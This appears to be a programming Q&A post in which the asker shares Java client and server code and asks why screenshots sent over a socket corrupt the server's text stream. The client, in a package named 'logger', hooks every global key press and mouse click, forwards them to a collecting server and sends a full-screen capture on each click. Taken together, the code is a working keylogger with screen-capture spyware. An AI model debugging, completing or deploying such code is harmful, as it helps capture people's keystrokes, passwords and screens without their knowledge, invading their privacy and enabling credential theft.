# Java socket, send image

Tags: java, image, sockets

UPDATE: read the bottom part for more updated information

I need help with my two programs, server and client program. The client program listen for mouse and key events and on every key event the client will send a string message to the server and on every mouse click capture the screen and send first a string message saying "CAPTURE" and after that send the image.

Here are mye two client classes:

```
package me.l0lkj.logger;

import java.awt.Dimension;
import java.awt.Graphics2D;
import java.awt.Image;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import java.io.File;
import java.net.URL;

import javax.imageio.ImageIO;

import org.jnativehook.GlobalScreen;
import org.jnativehook.NativeHookException;
import org.jnativehook.keyboard.NativeKeyEvent;
import org.jnativehook.keyboard.NativeKeyListener;
import org.jnativehook.mouse.NativeMouseEvent;
import org.jnativehook.mouse.NativeMouseInputListener; 
import org.jnativehook.mouse.NativeMouseWheelEvent;
import org.jnativehook.mouse.NativeMouseWheelListener;

public class Listener implements NativeKeyListener, NativeMouseInputListener, NativeMouseWheelListener
{
public void nativeKeyPressed(NativeKeyEvent e) 
{   
    MultiThreadChatClient.send(NativeKeyEvent.getKeyText(e.getKeyCode()));
}

public void nativeKeyReleased(NativeKeyEvent e) 
{
}

public void nativeKeyTyped(NativeKeyEvent e)
{
}

public void nativeMouseClicked(NativeMouseEvent e) 
{
}

public void nativeMousePressed(NativeMouseEvent e) 
{
    MultiThreadChatClient.send( "MOUSE: " + e.getX() + ", " + e.getY() + " " + e.getButton() );
    captureScreen( e.getX(), e.getY() );
}

public void nativeMouseReleased(NativeMouseEvent e) 
{
}

public void nativeMouseMoved(NativeMouseEvent e)
{
}

public void nativeMouseDragged(NativeMouseEvent e) 
{
}

public void nativeMouseWheelMoved(NativeMouseWheelEvent e)
{
}

public static void start()
{
    try 
    {
        GlobalScreen.registerNativeHook();
    }
    catch (NativeHookException ex)
    {
        System.exit(1);
    }
    Listener listener = new Listener();
    GlobalScreen.getInstance().addNativeKeyListener( listener );
    GlobalScreen.getInstance().addNativeMouseListener( listener );
    GlobalScreen.getInstance().addNativeMouseMotionListener( listener );
    GlobalScreen.getInstance().addNativeMouseWheelListener( listener );
}

public synchronized void captureScreen( int x, int y )
{
    try
    {
        File folder = new File( "C:/screen/" );
        folder.mkdirs();
        int count = folder.list().length;
        Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); 
        Robot robot = new Robot(); 
        BufferedImage capture = robot.createScreenCapture( new Rectangle( size ) ); 
        File save_path = new File( "C:/screen/screen_" + count + ".jpg" );
        try
        {
            URL cursorpath = MultiThreadChatClient.class.getResource( "cursor_arrow.png" );
            if( cursorpath != null )
            {
                Image cursor = ImageIO.read(cursorpath);
                Graphics2D graphics2D = capture.createGraphics();
                graphics2D.drawImage(cursor, x, y, 16, 16, null); 
            }
        }
        catch ( Exception e )
        {}
        save_path.mkdirs();
        ImageIO.write(capture, "JPG", save_path); 
        MultiThreadChatClient.send( "CAPTURE" );
        ImageIO.write( capture, "JPG", MultiThreadChatClient.getOutputStream() );//Write to server;

    }
    catch(Exception e) 
    {}
}
}
```

and here:

```
package me.l0lkj.logger;

import java.io.IOException;
import java.io.OutputStream;
import java.io.PrintStream;
import java.net.Socket;
import java.net.UnknownHostException;
import java.util.Random;

public class MultiThreadChatClient
{
private static Socket clientSocket = null;
private static PrintStream os = null;
private static boolean closed = false;

public static OutputStream getOutputStream()
{
    try 
    {
        return clientSocket.getOutputStream();
    }
    catch (IOException e) 
    {
        e.printStackTrace();
    }
    return null;
}

private static void start() 
{           
    int portNumber = 2222;
    String host = "localhost";

    try
    {
        clientSocket = new Socket(host, portNumber);
        os = new PrintStream(clientSocket.getOutputStream());
        os.println("KeyListener ID: " + new Random().nextInt());
    } 
    catch (UnknownHostException e) 
    {}
    catch (IOException e) 
    {}

    if ( clientSocket == null || os == null )
    {
        closed = true;
    }
    Listener.start();
}

public static void send(String msg)
{
    if (!closed)
    {
        os.println(msg);
    }
}

public static void main( String[] args )
{
    start();
}
}
```

And my server class:

```
package me.l0lkj.logger;

import java.awt.image.BufferedImage;
import java.io.DataInputStream;
import java.io.File;
import java.io.IOException;
import java.io.PrintStream;
import java.net.ServerSocket;
import java.net.Socket;

import javax.imageio.ImageIO;

public class MultiThreadChatServer {

private static ServerSocket serverSocket = null;
private static Socket clientSocket = null;

private static final int maxClientsCount = 50;
private static final clientThread[] threads = new clientThread[maxClientsCount];

public static void main(String args[]) 
{
    int portNumber = 2222;

    System.out.println("Lytter på port " + portNumber);

    try 
    {
        serverSocket = new ServerSocket(portNumber);
    } 
    catch (IOException e) 
    {
        System.out.println(e);
    }

    while (true) 
    {
        try 
        {
            clientSocket = serverSocket.accept();
            int i = 0;
            for (i = 0; i < maxClientsCount; i++)
            {
                if (threads[i] == null) 
                {
                    (threads[i] = new clientThread(clientSocket, threads)).start();
                    break;
                }
            }
        } 
        catch (IOException e) 
        {
            System.out.println(e);
        }
    }
}
}

class clientThread extends Thread 
{
private DataInputStream is = null;
private PrintStream os = null;
private Socket clientSocket = null;
private final clientThread[] threads;
private int maxClientsCount;

public clientThread(Socket clientSocket, clientThread[] threads) 
{
    this.clientSocket = clientSocket;
    this.threads = threads;
    maxClientsCount = threads.length;
}

public void close()
{
    try 
    {
        is.close();
    } 
    catch (IOException e1)
    {
        e1.printStackTrace();
    }
    try
    {
        os.close();
    } 
    catch (Exception e) 
    {
        e.printStackTrace();
    }
    try 
    {
        clientSocket.close();
    } 
    catch (IOException e) 
    {
        e.printStackTrace();
    }
}

@SuppressWarnings("deprecation")
public void run()
{
    int maxClientsCount = this.maxClientsCount;
    clientThread[] threads = this.threads;

    try
    {
        is = new DataInputStream(clientSocket.getInputStream());
        os = new PrintStream(clientSocket.getOutputStream());

        String name = is.readLine().trim();
        System.out.println("Ny klient kobler til... : " + name);

        while (true)
        {
            boolean skip = false;

            String line = is.readLine();

            if( line.contains( "CAPTURE" ) )
            {
                skip = true;
                readImg( line );
                continue;
            }

            if( !skip )
            {

                if( line.equals("END"))
                {
                    break;
                }

                if( line.length() != 1 && !line.contains( "Num:" ) && !line.contains("MOUSE:")){
                    line = "[" + line + "]";
                }

                if( line.contains("Space")) line = " ";
                if( line.contains("Enter")) line = line + "\n";
                if( line.contains("Period")) line = ".";

                if( line.contains( "MOUSE:" ) )
                {
                    System.out.println(line + "\n");
                }
                else
                {
                    System.out.print(line);
                }
            }
            //Behandle info, lagre info //TODO
        }

        for (int i = 0; i < maxClientsCount; i++) 
        {
            if (threads[i] == this)
            {
                threads[i] = null;
            }
        }

        is.close();
        os.close();
        clientSocket.close();
    } 
    catch (IOException e)
    {}
}

public synchronized void readImg( String line )
{
    try
    {
        String date = line.replace( "CAPTURE:", "" );
        File path = new File( "C:/captures/" );
        path.mkdirs();
        BufferedImage image = ImageIO.read( clientSocket.getInputStream() );
        ImageIO.write( image, "JPG", new File( path.getAbsolutePath() + "Capture_" + date ) );
        System.out.println("Er her");
        //read image and save it
    }
    catch ( Exception e )
    {
        e.printStackTrace();
    }
}
}
```

I get a error and a LONG string in console that looks like if you open a image in a text editor, so I can't get to the error code it self, because the buffer is limited.

What is causing the problem and how can I write my code more correct?

Thank you

UPDATE:
The client sends one of two things, 1: A String object or 2: First a String then a image through ImageIO.write();
The code I have below works on every second image if I comment out System.out.println(line); and if i do not comment those lines out the server goes crazy and prints the image data in console as a string.

HOW can I fix this?

```
        while (true)
        {
            String line = is.readLine();

            if( line.contains( "CAPTURE" ) )
            {
                readImg( line );
                continue;
            }
            else 
            {
                if( line.equals("END"))
                {
                    break;
                }

                if( line.length() != 1 && !line.contains( "Num:" ) && !line.contains("MOUSE:")){
                    line = "[" + line + "]";
                }

                if( line.contains("Space")) line = " ";
                if( line.contains("Enter")) line = line + "\n";
                if( line.contains("Period")) line = ".";

                if( line.contains( "MOUSE:" ) )
                {
                    //System.out.println(line + "\n");
                }
                else
                {
                    //System.out.print(line);
                }

                //Behandle info, lagre info //TODO
            }
        }
```

And the method used above:

```
public synchronized void readImg( String line )
{
    try
    {
        BufferedImage image = ImageIO.read( clientSocket.getInputStream() );
        System.out.println("Mottok bilde!!! " + image.getHeight() + "x" + image.getWidth());
        ImageIO.write( image, "JPG", new File( "C:/captures/bilde_" + System.currentTimeMillis() + ".jpg" ) );
    }
    catch ( Exception e )
    {
        e.printStackTrace();
    }
}
```

Comment: does your key press event works as expected?

Comment: Yes, everything works perfect until the code tries to send a picture

Comment: When `public synchronized void captureScreen` starts the server goes nuts and crashes